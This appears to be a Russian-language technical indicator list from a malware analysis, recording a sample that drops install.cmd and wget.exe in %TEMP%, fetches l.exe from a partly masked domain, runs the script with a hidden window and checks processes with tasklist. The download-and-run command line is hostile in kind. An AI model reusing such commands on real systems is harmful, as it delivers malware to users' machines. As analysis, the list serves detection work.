Техническая информация
- %TEMP%\install.cmd
- %TEMP%\wget.exe
- http://un####sa1988.co.vu/l.exe
- DNS ASK un####sa1988.co.vu
- '%TEMP%\wget.exe' http://un####sa1988.co.vu/l.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\install.cmd" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\install.cmd" "
- '<SYSTEM32>\find.exe' "wget.exe"
- '<SYSTEM32>\tasklist.exe'